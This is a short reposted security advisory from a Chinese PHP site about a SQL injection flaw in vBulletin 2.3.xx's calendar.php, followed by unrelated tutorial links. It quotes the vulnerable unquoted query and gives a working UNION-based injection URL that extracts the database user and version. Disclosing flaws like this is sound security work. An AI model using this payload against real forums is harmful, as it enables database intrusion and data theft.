vBulletin Forum 2.3.xx SQL Injection
更新时间:2006年10月09日 00:00:00 作者:
vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.
-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------
If the MySQL version is greater than 4.00, a UNION attack could be used.
-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------
The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.
相关文章
本系列适合有其他编程语言经验而PHP经验为0的人快速参考入门。2010-10-10
作为PHP最常用的框架之一,Laravel的框架目录布置得尤其清晰,适用于各种类型的项目开发。今天来记录下laravel入门需要熟悉的知识点2020-09-09
PHP文本数据库的搜索方法...2006-10-10
有关php运算符的知识大全 看似简单的东西,在实际运用中,还是很有意思的2011-11-11
今天我把ITIS系统数据源的表结构公布给大家,在今后的开发过程中,将一直会用到这张表。当然,随着开发的推进,有可能还会修改此表,到时候会另外说明。2008-06-06
进入2011年的暑假,已经要大三了,也该点更深刻的东西了。综合各方面的因素,决定还是先学习学习php,等有所掌获之后在去了解其他方面的东西。2011-07-07
也谈 PHP 和 MYSQL...2006-10-10
面向对象是一种计算机编程架构,比面向过程编辑具有更强的灵活性和扩展性。这里想提醒一下初学者:要想在编程这条路上走得比别人远,就一定要掌握面向对象编程技术。2014-11-11
今天小编就为大家分享一篇关于PHP count_chars()函数讲解,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧2019-02-02
PHP 中的变量用一个美元符号后面跟变量名来表示。变量名是区分大小写的2012-04-04
最新评论